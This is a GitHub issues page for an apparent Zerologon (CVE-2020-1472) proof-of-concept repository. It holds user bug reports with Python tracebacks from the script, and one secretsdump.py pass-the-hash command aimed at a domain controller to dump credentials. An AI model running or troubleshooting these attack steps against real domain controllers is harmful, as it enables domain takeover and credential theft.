
zerologon's People

Contributors

jmage-rs


zerologon's Issues

ipv6

I'm testing on a client, but the server is with ipv6, and the script is not working. Would there be another way to use this exploit?

Why bruteforce in reinstall_original_pw?

Why does reinstall_original_pw use the same attack to logon? At this point the target's account password should be empty, can't we use the hash of an empty password to authenticate?

Unable to impersonate users

Does anyone have any idea how to fix this issue?

sudo secretsdump.py -hashes :a656220101bf64f4768fecce5a4eb5fb 'REPUBLIC/[email protected]'
Impacket v0.9.23.dev1+20210518.120245.2e3cd7cd - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...

module "impacket.dcerpc.v5.nrpc" has no attribute "NetrServerPasswordSet2"

Hi!

The title shows every time I run the "set_empty_pw.py" script, but right after the 'error' your script says: "success! dc should now have the empty string as its machine password". But btw, it doesn't!

I've reinstalled impacket, with
"pip3 install impacket"
downloaded the impacket repo from source
"python3.6 setup.py install"
"python3.6 setup.py build"
"sudo apt install python-impacket"
I've tried to change all the "#!/usr/bin/env " to "!/usr/bin/python3.6"
and the script keeps complaining about that "has no attribute". I wrote a python3.6 script using NetrServerPasswordSet2 and then it doesn't get an error.

Traceback (most recent call last): File "/root/zerologon/set_empty_pw.py", line 147,

Traceback (most recent call last):
File "/root/zerologon/set_empty_pw.py", line 147, in
perform_attack('\\' + dc_name, dc_ip, dc_name)
File "/root/zerologon/set_empty_pw.py", line 123, in perform_attack
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/zerologon/set_empty_pw.py", line 28, in try_zero_authenticate
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/epm.py", line 1328, in hept_map
resp = dce.request(request)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x16c9a0d6 - ept_s_not_registered

Keep getting this error on all domains ..

Performing authentication attempts...
Traceback (most recent call last):
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/transport.py", line 346, in connect
self.__socket.connect(sa)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "cve-2020-1472-exploit.py", line 126, in
main()
File "cve-2020-1472-exploit.py", line 123, in main
perform_attack('\\' + dc_name, dc_ip, victim)
File "cve-2020-1472-exploit.py", line 70, in perform_attack
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/epm.py", line 1256, in hept_map
dce.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/transport.py", line 349, in connect
raise DCERPCException("Could not connect: %s" % msg)
impacket.dcerpc.v5.rpcrt.DCERPCException: Could not connect: timed out

'bytes' object does not support item assignment

set_empty_pw hits an error and is not successful; see the error below.

Other POCs worked OK

root@kali:~/Desktop/zerologon-master# python3 set_empty_pw.py DCNAME 10.102.9.46
Performing authentication attempts...
==============================================================================================================================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\x0c\x818\x9e\x86\xe34\xc7' 
NegotiateFlags:                  556793855 
AccountRid:                      1008 
ErrorCode:                       0 


server challenge b'\x0c\x08\xa9\x05\xb8SD>'
'bytes' object does not support item assignment

Success! DC should now have the empty string as its machine password.

Does it work with ipv6?

I'm testing on a client, but the server is with ipv6, and the script is not working. Would there be another way to use this exploit?

Error 104

Hi,
when I used the Python script I received this error:
Performing authentication attempts...
Unexpected error: [Errno 104] Connection reset by peer.
This might have been caused by invalid arguments or network issues.
Please help me.
